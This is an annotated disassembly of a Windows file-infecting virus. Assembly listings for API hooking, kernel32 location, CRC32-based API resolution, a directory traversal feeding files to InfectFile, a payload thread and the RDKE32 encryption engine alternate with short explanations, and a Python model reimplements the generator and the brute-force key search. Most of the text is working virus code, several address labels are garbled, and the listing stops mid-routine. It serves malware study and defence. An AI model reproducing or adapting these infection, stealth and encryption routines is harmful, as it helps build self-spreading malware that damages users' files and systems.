CODE:004016D0 push esi
CODE:004016D1 push ebx
CODE:004016D2 call GetCRC32OfString

CODE:004016D7 cmp [edi], ebx
CODE:004016D9 pop ebx
CODE:004016DA jz

CODE:004016DC pop esi
CODE:004016DD add edi, 0Ch
CODE:004016E0 jmp

CODE:004016E2 ;

CODE:004016E2 lea esi, [edx+ecx*4]
CODE:004016E5 mov eax, [esi]
CODE:004016E7 mov [edi+8], eax
CODE:004016EA lea eax, EntryPoint
CODE:004016F0 add eax, [edi+4]
CODE:004016F3 mov [esi], eax
CODE:004016F5 jmp
CODE:004016F7 ;

CODE:004016F7 pop esi
CODE:004016F8 inc ecx
CODE:004016F9 jmp

CODE:004016FB ;

CODE:004016FB popa
CODE:004016FC retn 4

CODE:004016FC HookAPIs endp

The previous code block hooks several APIs, a technique also known as per-process residency.

CODE:004016FF call GenericHookHandler
CODE: jmp AH_CreateFileA

CODE: A call GenericHookHandler
CODE: F jmp AH_WinExec

CODE: call GenericHookHandler
CODE: A jmp AH_OpenFile

CODE: call GenericHookHandler
CODE: jmp AH__lopen

CODE: B call GenericHookHandler
CODE: jmp AH_CreateProcessA

CODE: call GenericHookHandler
CODE: B jmp AH_CopyFileA

CODE: call GenericHookHandler
CODE: jmp AH_MoveFileA
CODE: C call GenericHookHandler
CODE: jmp AH_MoveFileExA

CODE: call GenericHookHandler
CODE: C jmp AH_FindFirstFileA

CODE: call GenericHookHandler
CODE: jmp AH_GetFullPathNameA

CODE: D call GenericHookHandler
CODE: jmp AH_GetShortPathNameA

CODE: call GenericHookHandler
CODE: D jmp AH_SetFileAttributesA

CODE: call GenericHookHandler
CODE: jmp AH_GetFileAttributesA

CODE: E call GenericHookHandler
CODE: jmp AH_GetBinaryTypeA

CODE: pushf
CODE: A pusha
CODE: B call Initialize

CODE:004017A0 test eax, eax
CODE:004017A2 jz short loc_4017cf

CODE:004017A4 or ThreadExecution, 0FFFFFFFFh
CODE:004017AB push 0FFFFh
CODE:004017B0 push ThreadHandle
CODE:004017B6 mov al, 1Bh
CODE:004017B8 call StealthAPI

CODE:004017BD push ThreadHandle
CODE:004017C3 mov al, 5
CODE:004017C5 call StealthAPI

CODE:004017CA call UnInitialize
CODE:004017CF loc_4017cf:
CODE:004017CF add esp, 1000h
CODE:004017D5 popa
CODE:004017D6 popf
CODE:004017D7 jmp AH_ExitProcess

CODE:004017DD pushf
CODE:004017DE pusha
CODE:004017DF call Initialize

CODE:004017E4 test eax, eax
CODE:004017E6 jz short loc_40184a

CODE:004017E8 mov eax, 3
CODE:004017ED call RandomNumber

CODE:004017F2 test eax, eax
CODE:004017F4 jnz short loc_40184a

CODE:004017F6 push 0
CODE:004017F8 lea eax, PayloadThread
CODE:004017FE push esp
CODE:004017FF push 0
CODE: push 0
CODE: push eax
CODE: push 0
CODE: push 0
CODE: mov al, 1Ah
CODE: A call StealthAPI

CODE: F pop ebx
CODE: test eax, eax
CODE: jz short loc_40184a

CODE: push eax
CODE: mov al, 5
CODE: call StealthAPI

CODE: C push 0
CODE: E lea eax, szpayloadmessage
CODE: push eax
CODE: lea eax, szpayloadtitle
CODE: B push eax
CODE: C push dword ptr [esp+1034h]
CODE: mov al, 29h
CODE: call StealthAPI

CODE: A call UnInitialize

CODE: F add esp, 1000h
CODE: popa
CODE: popf
CODE: retn 10h
CODE: A loc_40184a:

CODE: A call UnInitialize

CODE: F add esp, 1000h
CODE: popa
CODE: popf
CODE: jmp AH_ShellAboutA

The previous code block is the series of handlers for the hooked API functions.

CODE: D GenericHookHandler proc near

CODE: D arg_ff8 = dword ptr 0FFCh
CODE: D arg_1004 = dword ptr 1008h

CODE: D pushf
CODE: E pusha

CODE: F cmp GenericHookState, 0
CODE: jnz

CODE: or GenericHookState, 0FFFFFFFFh
CODE: F call Initialize

CODE: test eax, eax
CODE: jz

CODE: cmp Infect_Encrypted, 0
CODE: F jz

CODE: mov esi, [esp+24h+arg_1004]
CODE: lea edi, [ebp+13ch]
CODE: E push edi
CODE: F push esi
CODE: mov al, 16h
CODE: call StealthAPI

CODE: inc eax
CODE: jz

CODE: A dec eax
CODE: B push eax
CODE: C mov al, 5
CODE: E call StealthAPI

CODE:004018A3 lea edi, [ebp+168h]
CODE:004018A9 mov esi, [esp+30h+arg_ff8]

CODE:004018B0 lodsb
CODE:004018B1 stosb
CODE:004018B2 test al, al
CODE:004018B4 jnz short

CODE:004018B6 call InfectFile

CODE:004018BB add esp, 1000h
CODE:004018C1 and GenericHookState, 0
CODE:004018C8 popa
CODE:004018C9 popf
CODE:004018CA retn

CODE:004018CA GenericHookHandler endp

The previous code block is the generic handler routine for the hooked APIs.

CODE:004018CB Uppercase proc near

CODE:004018CB pusha
CODE:004018CC mov edi, esi

CODE:004018CE lodsb
CODE:004018CF cmp al, 'a'
CODE:004018D1 jb

CODE:004018D3 cmp al, 'z'
CODE:004018D5 ja

CODE:004018D7 and al, b

CODE:004018D9 stosb
CODE:004018DA test al, al
CODE:004018DC jnz

CODE:004018DE popa
CODE:004018DF retn

CODE:004018DF Uppercase endp

The previous code block converts a string to all uppercase.

CODE:004018E0 RandomNumber proc near

CODE:004018E0 var_4 = dword ptr -4
CODE:004018E0 pusha
CODE:004018E1 push eax

CODE:004018E2 cmp RandomNumberState, 0
CODE:004018E9 jnz

CODE:004018EB or RandomNumberState, 0FFFFFFFFh
CODE:004018F2 call genrand_int32

CODE:004018F7 pop ecx
CODE:004018F8 xor edx, edx
CODE:004018FA div ecx
CODE:004018FC mov [esp+20h+var_4], edx
CODE: and RandomNumberState, 0
CODE: popa
CODE: retn

CODE: RandomNumber endp

The previous code block returns a random number within a range.

CODE: GetAPIsFromCRC32List proc near

CODE: var_28 = dword ptr -28h
CODE: var_24 = dword ptr -24h
CODE: PA_EAX = dword ptr -4
CODE: ARG1 = dword ptr 4
CODE: ARG2 = dword ptr 8
CODE: ARG3 = dword ptr 0Ch
CODE: ARG4 = dword ptr 10h

CODE: pusha
CODE: A or dword ptr [ebp+14h], 0FFFFFFFFh
CODE: E mov ebx, [esp+20h+ARG4]
CODE: mov esi, [ebx+3ch]
CODE: add esi, ebx
CODE: mov esi, [esi+78h]
CODE: A lea esi, [ebx+esi+18h]
CODE: E lodsd
CODE: F xchg eax, ecx
CODE: inc ecx
CODE: lodsd
CODE: add eax, ebx
CODE: push eax
CODE: lodsd
CODE: lea edi, [ebx+eax]
CODE: mov edi, [edi]
CODE: B add edi, ebx
CODE: D lodsd
CODE: E add eax, ebx
CODE: push eax
CODE: dec ecx
CODE: jecxz short

CODE: xchg esi, edi
CODE: inc dword ptr [ebp+14h]
CODE: call GetCRC32OfString

CODE: E mov edi, esi
CODE: mov esi, [esp+28h+ARG1]
CODE: or edx, 0FFFFFFFFh

CODE: inc edx
CODE: lodsd
CODE: test eax, eax
CODE: B jz short

CODE: D cmp eax, ebx
CODE: F jnz short

CODE: mov esi, [esp+28h+var_28]
CODE: mov ebx, [ebp+14h]
CODE: movzx ebx, word ptr [esi+ebx*2]
CODE: B mov esi, [esp+28h+var_24]
CODE: F mov ebx, [esi+ebx*4]
CODE: add ebx, [esp+28h+ARG4]
CODE: mov eax, [esp+28h+ARG2]
CODE: A lea eax, [eax+edx*4]
CODE: D mov [eax], ebx
CODE: F jmp short

CODE: mov esi, [esp+28h+ARG2]
CODE: mov ecx, [esp+28h+ARG3]

CODE: lodsd
CODE: A test eax, eax
CODE: C jz short

CODE: E loop

CODE: add esp, 8
CODE: mov [esp+20h+PA_EAX], eax
CODE: popa
CODE: retn 10h

CODE: GetAPIsFromCRC32List endp
The previous code block retrieves pointers to several APIs. The function requires a pointer to the CRC32 list, a pointer to the buffer where the API addresses will be saved, the number of imported APIs and the base address.

CODE: B GetCRC32OfString proc near

CODE: B push eax
CODE: C push ecx
CODE: D push edx
CODE: E push edi
CODE: F cld
CODE: xor ecx, ecx
CODE: dec ecx
CODE: mov edx, ecx

CODE: cmp byte ptr [esi], 0
CODE: jz

CODE: A xor eax, eax
CODE: C xor ebx, ebx
CODE: E lodsb
CODE: F xor al, cl
CODE:004019A1 mov cl, ch
CODE:004019A3 mov ch, dl
CODE:004019A5 mov dl, dh
CODE:004019A7 mov dh, 8

CODE:004019A9 shr bx, 1
CODE:004019AC rcr ax, 1
CODE:004019AF jnb

CODE:004019B1 xor ax, 8320h
CODE:004019B5 xor bx, 0EDB8h

CODE:004019BA dec dh
CODE:004019BC jnz

CODE:004019BE xor ecx, eax
CODE:004019C0 xor edx, ebx
CODE:004019C2 dec edi
CODE:004019C3 jnz

CODE:004019C5 not edx
CODE:004019C7 not ecx
CODE:004019C9 mov eax, edx
CODE:004019CB rol eax, 10h
CODE:004019CE mov ax, cx
CODE:004019D1 inc esi
CODE:004019D2 xchg eax, ebx
CODE:004019D3 pop edi
CODE:004019D4 pop edx
CODE:004019D5 pop ecx
CODE:004019D6 pop eax
CODE:004019D7 retn

CODE:004019D7 GetCRC32OfString endp

The previous code block calculates the CRC32 of a zero-terminated string. The function expects a pointer to the ASCII string in the ESI register and returns the checksum in EBX.

CODE:004019D8 GetKernel32Base proc near
CODE:004019D8 push eax
CODE:004019D9 push esi
CODE:004019DA xor esi, esi
CODE:004019DC mov esi, fs:[esi]

CODE:004019DF mov eax, [esi]
CODE:004019E1 inc eax
CODE:004019E2 jz

CODE:004019E4 dec eax
CODE:004019E5 xchg eax, esi
CODE:004019E6 jmp

CODE:004019E8 mov eax, [esi+4]
CODE:004019EB xor ax, ax

CODE:004019EE cmp word ptr [eax], 5A4Dh
CODE:004019F3 jz

CODE:004019F5 sub eax, 10000h
CODE:004019FA jmp

CODE:004019FC mov [ebp+0], eax
CODE:004019FF mov esi, [eax+3ch]
CODE:00401A02 add esi, eax
CODE:00401A04 cmp dword ptr [esi], 4550h
CODE:00401A0A jnz
CODE:00401A0C pop esi
CODE:00401A0D pop eax
CODE:00401A0E retn

CODE:00401A0E GetKernel32Base endp

The previous code retrieves the location of Kernel32 in memory. It does so using SEH: it walks the exception handler chain to its last entry and rounds the handler address down to the module base.

CODE:00401A0F DirectoryTraversal proc near

CODE:00401A0F var_17c = dword ptr -17Ch
CODE:00401A0F var_170 = dword ptr -170h
CODE:00401A0F var_144 = dword ptr -144h
CODE:00401A0F var_40 = dword ptr -40h

CODE:00401A0F pusha
CODE:00401A10 push 0
CODE:00401A12 lea eax, DIR_Root+2
CODE:00401A18 push eax
CODE:00401A19 mov al, 0Ch
CODE:00401A1B call StealthAPI

CODE:00401A20 test eax, eax

CODE:00401A28 sub esp, 140h
CODE:00401A2E push esp
CODE:00401A2F lea eax, DIR_Wildcards
CODE:00401A35 push eax
CODE:00401A36 mov al, 16h
CODE:00401A38 call StealthAPI

CODE:00401A3D push eax
CODE:00401A3E inc eax

CODE:00401A45 dec eax

CODE:00401A46 lea ebx, [esp+174h+var_144]
CODE:00401A4A test byte ptr [esp+174h+var_170], 10h
CODE:00401A4F jz

CODE:00401A51 cmp byte ptr [ebx], '.'
CODE:00401A54 jz

CODE:00401A56 push ebx
CODE:00401A57 mov al, 0Ch
CODE:00401A59 call StealthAPI
CODE:00401A5E jmp short
CODE:00401A5E
CODE:00401A60 ;
CODE:00401A60
CODE:00401A60 lea esi, [esp+174h+var_170]
CODE:00401A64 lea edi, [ebp+13ch]
CODE:00401A6A mov ecx, 140h
CODE:00401A6F rep movsb
CODE:00401A71 push eax
CODE:00401A72 lea esi, [ebp+168h]
CODE:00401A78 call Uppercase
CODE:00401A78
CODE:00401A7D call GetCRC32OfString
CODE:00401A7D
CODE:00401A82 lea esi, CRC32_Checksumfile_List
CODE:00401A82
CODE:00401A88
CODE:00401A88 lodsd
CODE:00401A89 xchg eax, ecx
CODE:00401A8A jecxz
CODE:00401A8A
CODE:00401A8C cmp ebx, ecx
CODE:00401A8E jnz
CODE:00401A8E
CODE:00401A90 lea esi, [ebp+168h]
CODE:00401A96 push esi
CODE:00401A97 push 80h
CODE:00401A9C push esi
CODE:00401A9D mov al, 11h
CODE:00401A9F call StealthAPI
CODE:00401A9F
CODE:00401AA4 mov al, 15h
CODE:00401AA6 call StealthAPI
CODE:00401AA6
CODE:00401AAB pop eax
CODE:00401AAC jmp
CODE:00401AAC
CODE:00401AAE
CODE:00401AAE
CODE:00401AAE pop eax
CODE:00401AAF or dword ptr [ebp+280h], 0FFFFFFFFh
CODE:00401AB6 call InfectFile
CODE:00401AB6
CODE:00401ABB inc dword ptr [ebp+280h]
CODE:00401AC1 jz
CODE:00401AC1
CODE:00401AC3 dec dword ptr [ebp+27ch]
CODE:00401AC9 jz
CODE:00401AC9
CODE:00401ACB
CODE:00401ACB
CODE:00401ACB lea ebx, [esp+174h+var_170]
CODE:00401ACF push ebx
CODE:00401AD0 push eax
CODE:00401AD1 mov al, 17h
CODE:00401AD3 call StealthAPI
CODE:00401AD3
CODE:00401AD8 cmp ThreadExecution, 0FFFFFFFFh
CODE:00401ADF jz short
CODE:00401ADF
CODE:00401AE1 test eax, eax
CODE:00401AE3 mov eax, [esp+17ch+var_17c]
CODE:00401AE6 jnz
CODE:00401AE6
CODE:00401AEC
CODE:00401AEC
CODE:00401AEC push eax
CODE:00401AED mov al, 18h
CODE:00401AEF call StealthAPI
CODE:00401AEF
CODE:00401AF4 lea eax, DIR_Parent
CODE:00401AFA push eax
CODE:00401AFB mov al, 0Ch
CODE:00401AFD call StealthAPI
CODE:00401AFD
CODE:00401B02 add esp, 144h
CODE:00401B08 mov eax, [esp+40h+var_40]
CODE:00401B0B test eax, eax
CODE:00401B0D jnz short
CODE:00401B0D
CODE:00401B0F
CODE:00401B0F
CODE:00401B0F
CODE:00401B0F add esp, 4
CODE:00401B12 popa
CODE:00401B13 retn
CODE:00401B13
CODE:00401B14
CODE:00401B14
CODE:00401B14
CODE:00401B14 mov esi, esp
CODE:00401B16 lodsd
CODE:00401B17 test eax, eax
CODE:00401B19 jz
CODE:00401B19
CODE:00401B1B mov al, 18h
CODE:00401B1D call StealthAPI
CODE:00401B1D
CODE:00401B22 add esp, 140h
CODE:00401B28 jmp
CODE:00401B28
CODE:00401B28 DirectoryTraversal endp

The previous code block traverses directories looking for files to infect. It enters the start directory (DIR_Root), enumerates the entries matching DIR_Wildcards into a 140h-byte find-data buffer on the stack, recurses into entries that carry the directory attribute (bit 10h) unless their name begins with '.', and steps back to DIR_Parent when a directory is exhausted. For every file, the name is copied to [ebp+168h], uppercased and hashed with GetCRC32OfString; names whose CRC32 appears in CRC32_Checksumfile_List take a separate path, all other files are passed to InfectFile. The loop also ends when ThreadExecution is set to -1.

CODE:00401B2A init_genrand proc near
CODE:00401B2A
CODE:00401B2A ARG1 = dword ptr 4
CODE:00401B2A
CODE:00401B2A pusha
CODE:00401B2B lea edi, [ebp+304h]
CODE:00401B31 xor ecx, ecx
CODE:00401B33 mov eax, [esp+20h+arg1]
CODE:00401B37 stosd
CODE:00401B37
CODE:00401B38
CODE:00401B38 inc ecx
CODE:00401B39 cmp ecx, 270h
CODE:00401B3F jz
CODE:00401B3F
CODE:00401B41 mov edx, eax
CODE:00401B43 shr edx, 1Eh
CODE:00401B46 xor eax, edx
CODE:00401B48 imul eax, 6C078965h
CODE:00401B4E add eax, ecx
CODE:00401B50 stosd
CODE:00401B51 jmp
CODE:00401B51
CODE:00401B53
CODE:00401B53
CODE:00401B53 mov [ebp+300h], ecx
CODE:00401B59 popa
CODE:00401B5A retn 4
CODE:00401B5A
CODE:00401B5A init_genrand endp

The previous code block initializes the generator's state array of 270h (624) dwords at [ebp+304h] from a single 32-bit seed, using the MT19937 recurrence mt[i] = 6C078965h * (mt[i-1] xor (mt[i-1] >> 30)) + i, and stores the index value 270h at [ebp+300h] so that the next call to genrand_int32 regenerates the whole array before returning a value.

CODE:00401B5D init_by_array proc near
CODE:00401B5D
CODE:00401B5D var_24 = dword ptr -24h
CODE:00401B5D arg_0 = dword ptr 4
CODE:00401B5D arg_4 = dword ptr 8
CODE:00401B5D
CODE:00401B5D pusha
CODE:00401B5E lea edi, [ebp+304h]
CODE:00401B64 mov esi, [esp+20h+arg_0]
CODE:00401B68 xor edx, edx
CODE:00401B6A push edx
CODE:00401B6B inc edx
CODE:00401B6C mov eax, [esp+24h+arg_4]
CODE:00401B70 mov ecx, 270h
CODE:00401B75 cmp eax, ecx
CODE:00401B77 jl
CODE:00401B77
CODE:00401B79 mov ecx, eax
CODE:00401B79
CODE:00401B7B
CODE:00401B7B push 12BD6AAh
CODE:00401B80 call init_genrand
CODE:00401B80
CODE:00401B85
CODE:00401B85
CODE:00401B85 mov eax, [edi+edx*4-4]
CODE:00401B89 mov ebx, eax
CODE:00401B8B shr eax, 1Eh
CODE:00401B8E xor eax, ebx
CODE:00401B90 imul eax, 19660Dh
CODE:00401B96 xor eax, [edi+edx*4]
CODE:00401B99 mov ebx, [esp+24h+var_24]
CODE:00401B9C add eax, ebx
CODE:00401B9E add eax, [esi+ebx*4]
CODE:00401BA1 mov [edi+edx*4], eax
CODE:00401BA4 inc edx
CODE:00401BA5 inc [esp+24h+var_24]
CODE:00401BA8 cmp edx, 270h
CODE:00401BAE jl short
CODE:00401BAE
CODE:00401BB0 mov eax, [edi+edx*4-4]
CODE:00401BB4 mov [edi], eax
CODE:00401BB6 xor edx, edx
CODE:00401BB8 inc edx
CODE:00401BB8
CODE:00401BB9
CODE:00401BB9
CODE:00401BB9 mov ebx, [esp+24h+var_24]
CODE:00401BBC cmp ebx, [esp+24h+arg_4]
CODE:00401BC0 jl short
CODE:00401BC0
CODE:00401BC2 and [esp+24h+var_24], 0
CODE:00401BC2
CODE:00401BC6
CODE:00401BC6
CODE:00401BC6
CODE:00401BC8 mov ecx, 26Fh
CODE:00401BC8
CODE:00401BCD
CODE:00401BCD mov eax, [edi+edx*4-4]
CODE:00401BD1 mov ebx, eax
CODE:00401BD3 shr eax, 1Eh
CODE:00401BD6 xor eax, ebx
CODE:00401BD8 imul eax, 5D588B65h
CODE:00401BDE xor eax, [edi+edx*4]
CODE:00401BE1 sub eax, edx
CODE:00401BE3 mov [edi+edx*4], eax
CODE:00401BE6 inc edx
CODE:00401BE7 mov eax, 270h
CODE:00401BEC cmp edx, eax
CODE:00401BEE jl
CODE:00401BEE
CODE:00401BF0 mov eax, [edi+eax*4-4]
CODE:00401BF4 mov [edi], eax
CODE:00401BF6 xor edx, edx
CODE:00401BF8 inc edx
CODE:00401BF8
CODE:00401BF9
CODE:00401BF9
CODE:00401BF9 loop
CODE:00401BF9
CODE:00401BFB mov dword ptr [edi], h
CODE:00401C01 pop eax
CODE:00401C02 popa
CODE:00401C03 retn 8
CODE:00401C03
CODE:00401C03 init_by_array endp

The previous code block initializes the state array from an array of 32-bit seeds (arg_0 points to the key array, arg_4 holds its length). It first seeds the array with the constant 12BD6AAh (19650218) through init_genrand, then mixes in the key words over max(270h, length) iterations with the multiplier 19660Dh, and finally makes 26Fh passes with the multiplier 5D588B65h, which is exactly the MT19937 reference init_by_array procedure.

CODE:00401C06 genrand_int32 proc near
CODE:00401C06
CODE:00401C06 lea edi, [ebp+304h]
CODE:00401C0C lea esi, mag01
CODE:00401C12 mov edx, [ebp+300h]
CODE:00401C18 cmp edx, 270h
CODE:00401C1E jl
CODE:00401C1E
CODE:00401C20 xor ecx, ecx
CODE:00401C20
CODE:00401C22
CODE:00401C22 cmp ecx, 0E3h
CODE:00401C28 jz
CODE:00401C28
CODE:00401C2A call proc00401cb4
CODE:00401C2A
CODE:00401C2F xor eax, [edi+ecx*4+634h]
CODE:00401C36 mov [edi+ecx*4], eax
CODE:00401C39 inc ecx
CODE:00401C3A jmp
CODE:00401C3A
CODE:00401C3C
CODE:00401C3C
CODE:00401C3C
CODE:00401C3C cmp ecx, 26Fh
CODE:00401C42 jz
CODE:00401C42
CODE:00401C44 call proc00401cb4
CODE:00401C44
CODE:00401C49 xor eax, [edi+ecx*4-38ch]
CODE:00401C50 mov [edi+ecx*4], eax
CODE:00401C53 inc ecx
CODE:00401C54 jmp
CODE:00401C54
CODE:00401C56
CODE:00401C56
CODE:00401C56 mov eax, [edi]
CODE:00401C58 and eax, 7FFFFFFFh
CODE:00401C5D mov ebx, [edi+9bch]
CODE:00401C63 call sub_401cc0
CODE:00401C63
CODE:00401C68 xor eax, [edi+630h]
CODE:00401C6E mov [edi+9bch], eax
CODE:00401C74 and dword ptr [ebp+300h], 0
CODE:00401C74
CODE:00401C7B
CODE:00401C7B mov ecx, [ebp+300h]
CODE:00401C81 mov ebx, [edi+ecx*4]
CODE:00401C84 inc dword ptr [ebp+300h]
CODE:00401C8A mov edx, ebx
CODE:00401C8C shr edx, 0Bh
CODE:00401C8F xor ebx, edx
CODE:00401C91 mov edx, ebx
CODE:00401C93 shl edx, 7
CODE:00401C96 and edx, 9D2C5680h
CODE:00401C9C xor ebx, edx
CODE:00401C9E mov edx, ebx
CODE:00401CA0 shl edx, 0Fh
CODE:00401CA3 and edx, 0EFC60000h
CODE:00401CA9 xor ebx, edx
CODE:00401CAB mov edx, ebx
CODE:00401CAD shr edx, 12h
CODE:00401CB0 xor ebx, edx
CODE:00401CB2 xchg eax, ebx
CODE:00401CB3 retn
CODE:00401CB3
CODE:00401CB3 genrand_int32 endp

The previous code block generates a random number in the interval [0, 0FFFFFFFFh]. When the index at [ebp+300h] has reached 270h it regenerates the whole array in three parts (elements 0 to 0E2h, 0E3h to 26Eh, and the last element), combining each element with the partner 397 dwords (634h bytes) ahead or 227 dwords (38Ch bytes) behind and the mag01 table, and resets the index to zero. It then returns the next element after the MT19937 tempering steps: shift right 11, shift left 7 masked with 9D2C5680h, shift left 15 masked with 0EFC60000h, shift right 18.

CODE:00401D5B RDKE32Encrypt proc near
CODE:00401D5B
CODE:00401D5B arg_0 = dword ptr 4
CODE:00401D5B arg_4 = dword ptr 8
CODE:00401D5B arg_8 = dword ptr 0Ch
CODE:00401D5B arg_c = dword ptr 10h
CODE:00401D5B
CODE:00401D5B pusha
CODE:00401D5C mov edi, [esp+20h+arg_0]
CODE:00401D60 mov ebx, [esp+20h+arg_4]
CODE:00401D64 mov ecx, [esp+20h+arg_8]
CODE:00401D68 mov eax, [esp+20h+arg_c]
CODE:00401D6C push ebx
CODE:00401D6D push ecx
CODE:00401D6E push edi
CODE:00401D6F call SHA1
CODE:00401D6F
CODE:00401D74 call RandomNumber
CODE:00401D74
CODE:00401D79 inc eax
CODE:00401D7A xchg eax, edx
CODE:00401D7B call cryptor
CODE:00401D7B
CODE:00401D80 popa
CODE:00401D81 retn 10h
CODE:00401D81
CODE:00401D81 RDKE32Encrypt endp

The previous code block is the random decoding key engine encryptor for the virus. It first writes the SHA-1 digest of the plaintext (the buffer at arg_4, arg_8 bytes long) to arg_0, then obtains a value from RandomNumber, increments it so the key can never be zero, and XORs the buffer with that key in cryptor. The key itself is not stored anywhere: only the digest survives.

CODE:00401D84 RDKE32Decrypt proc near
CODE:00401D84
CODE:00401D84 arg_0 = dword ptr 4
CODE:00401D84 arg_4 = dword ptr 8
CODE:00401D84 arg_8 = dword ptr 0Ch
CODE:00401D84
CODE:00401D84 pusha
CODE:00401D85 mov edi, [esp+20h+arg_0]
CODE:00401D89 mov ebx, [esp+20h+arg_4]
CODE:00401D8D mov ecx, [esp+20h+arg_8]
CODE:00401D91 sub esp, 14h
CODE:00401D94 mov esi, esp
CODE:00401D96 xor edx, edx
CODE:00401D96
CODE:00401D98
CODE:00401D98 bruteforce_loop:
CODE:00401D98 inc edx
CODE:00401D99 call cryptor
CODE:00401D99
CODE:00401D9E push ebx
CODE:00401D9F push ecx
CODE:00401DA0 push esi
CODE:00401DA1 call SHA1
CODE:00401DA1
CODE:00401DA6 pusha
CODE:00401DA7 push 5
CODE:00401DA9 pop ecx
CODE:00401DAA repe cmpsd
CODE:00401DAC popa
CODE:00401DAD jz short RDKE32Decrypt_exit
CODE:00401DAD
CODE:00401DAF call cryptor
CODE:00401DAF
CODE:00401DB4 cmp ThreadExecution, 0FFFFFFFFh
CODE:00401DBB jz short RDKE32Decrypt_exit
CODE:00401DBB
CODE:00401DBD jmp short bruteforce_loop
CODE:00401DBD
CODE:00401DBF
CODE:00401DBF
CODE:00401DBF RDKE32Decrypt_exit:
CODE:00401DBF
CODE:00401DBF add esp, 14h
CODE:00401DC2 popa
CODE:00401DC3 retn 0Ch
CODE:00401DC3
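The RNGMT engine (init_genrand, init_by_array, genrand_int32) and the RDKE32 engine (cryptor together with the encryptor and the brute-force decryptor) listed above, modelled in Python as an added example. This is reference code written for this analysis, not code from the virus or the paper: the constants are the ones in the listings, Python's hashlib stands in for the virus' own SHA1 routine, the sample buffer and the keys are constructed, and the bound on the key search is this model's (the engine has none). The RandomNumber call of RDKE32Encrypt is assumed to be one draw of the generator and is replaced here by an explicit key argument so the search finishes quickly.

```python
# Added reference model, written for this analysis (not code from the virus or
# the paper), of the RNGMT engine (init_genrand / init_by_array / genrand_int32,
# i.e. MT19937) and the RDKE32 engine (cryptor plus the SHA-1 verified key
# search). Constants come from the listings; hashlib stands in for the virus'
# own SHA1 routine; SAMPLE and the keys below are constructed for the demo.
import hashlib
import random

N, M = 624, 397                 # 270h state words; partner offset 634h/4 = 397
MASK32 = 0xFFFFFFFF
UPPER, LOWER = 0x80000000, 0x7FFFFFFF
MAG01 = (0, 0x9908B0DF)         # the mag01 table used by genrand_int32


class MT19937:
    """State array ([ebp+304h] in the virus) and index ([ebp+300h])."""

    def __init__(self):
        self.mt = [0] * N
        self.mti = N            # regenerate on the first draw

    def init_genrand(self, seed):
        # mt[i] = 6C078965h * (mt[i-1] ^ (mt[i-1] >> 1Eh)) + i
        self.mt[0] = seed & MASK32
        for i in range(1, N):
            p = self.mt[i - 1]
            self.mt[i] = (0x6C078965 * (p ^ (p >> 30)) + i) & MASK32
        self.mti = N

    def init_by_array(self, key):
        self.init_genrand(0x12BD6AA)        # push 12BD6AAh / call init_genrand
        i, j = 1, 0
        for _ in range(max(N, len(key))):   # mov ecx, 270h / cmp eax, ecx / jl
            p = self.mt[i - 1]
            self.mt[i] = ((self.mt[i] ^ ((p ^ (p >> 30)) * 0x19660D)) + key[j] + j) & MASK32
            i, j = i + 1, j + 1
            if i >= N:
                self.mt[0], i = self.mt[N - 1], 1
            if j >= len(key):
                j = 0
        for _ in range(N - 1):              # mov ecx, 26Fh ... loop
            p = self.mt[i - 1]
            self.mt[i] = ((self.mt[i] ^ ((p ^ (p >> 30)) * 0x5D588B65)) - i) & MASK32
            i += 1
            if i >= N:
                self.mt[0], i = self.mt[N - 1], 1
        self.mt[0] = UPPER                  # the final store to [edi]

    def _regenerate(self):
        # One loop for what the virus does in three (0..0E2h, 0E3h..26Eh, 26Fh)
        mt = self.mt
        for k in range(N):
            y = (mt[k] & UPPER) | (mt[(k + 1) % N] & LOWER)
            mt[k] = mt[(k + M) % N] ^ (y >> 1) ^ MAG01[y & 1]
        self.mti = 0

    def genrand_int32(self):
        if self.mti >= N:
            self._regenerate()
        y = self.mt[self.mti]
        self.mti += 1
        y ^= y >> 11                        # tempering, as in the listing
        y ^= (y << 7) & 0x9D2C5680
        y ^= (y << 15) & 0xEFC60000
        y ^= y >> 18
        return y & MASK32


def first_draw_from_seed(seed):
    g = MT19937()
    g.init_genrand(seed)
    return g.genrand_int32()


def first_draw_from_key(key):
    g = MT19937()
    g.init_by_array(list(key))
    return g.genrand_int32()


def matches_cpython(seed):
    """CPython seeds random.Random(int) with init_by_array over the seed's 32-bit
    words and getrandbits(32) is genrand_int32: an independent MT19937 to check
    this model against (seeds below 2**32 only)."""
    return first_draw_from_key([seed]) == random.Random(seed).getrandbits(32)


def cryptor(data, key, count):
    """xor [ebx], dl / inc ebx / rol edx, 8 / loop: a zero key byte neither
    XORs nor advances the pointer, so such keys leave the buffer tail in clear."""
    out, pos = bytearray(data), 0
    for _ in range(count):
        kb = key & 0xFF
        if kb:
            if pos < len(out):              # the engine itself has no bounds check
                out[pos] ^= kb
            pos += 1
        key = ((key << 8) | (key >> 24)) & MASK32
    return bytes(out)


def rdke32_encrypt(data, key):
    """RDKE32Encrypt: keep SHA-1(plaintext), XOR with a key that is never stored
    (the engine uses RandomNumber()+1; here the key is passed in)."""
    return hashlib.sha1(data).digest(), cryptor(data, key, len(data))


def rdke32_decrypt(digest, data, count, max_key=1 << 16):
    """RDKE32Decrypt: try keys 1, 2, 3, ... until SHA-1 of the decrypted buffer
    equals the stored digest. max_key is this model's bound; the engine stops
    only on a match or when ThreadExecution is set to -1."""
    for key in range(1, max_key + 1):
        plain = cryptor(data, key, count)
        if hashlib.sha1(plain).digest() == digest:
            return key, plain
    return None


SAMPLE = b"constructed RDKE32 sample, 40 bytes long"   # constructed, 40 bytes
KEY_WITH_ZERO_BYTES = 0x0102    # DL sees 02 00 00 01, so only 2 of every 4 steps advance

if __name__ == "__main__":
    digest, cipher = rdke32_encrypt(SAMPLE, KEY_WITH_ZERO_BYTES)
    print("tail left in clear:", cipher[20:])
    print("recovered:", rdke32_decrypt(digest, cipher, len(cipher)))
```

Running it with the constructed key 102h shows the zero-byte behaviour of cryptor: the pointer only advances on non-zero key bytes, so the second half of the 40-byte buffer is left in clear, and the decryptor still recovers the key after 258 SHA-1 computations. The generator can be checked against the published MT19937 reference outputs (seed 5489 and the key 123h, 234h, 345h, 456h) and, for init_by_array, against CPython's random module, which seeds the same way.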
CODE:00401DC3 RDKE32Decrypt endp

The previous code block is the random decoding key engine decryptor for the virus. Since the key is not stored, it is recovered by brute force: starting from 1, each cand candidate key in EDX is applied to the buffer with cryptor, the SHA-1 of the result is computed into a 14h-byte stack buffer and its five dwords are compared with the stored digest at arg_0. On a mismatch cryptor is applied again to restore the buffer and the next key is tried; the loop ends on a match or when ThreadExecution is set to -1.

CODE:00401DD7 cryptor proc near
CODE:00401DD7
CODE:00401DD7 pusha
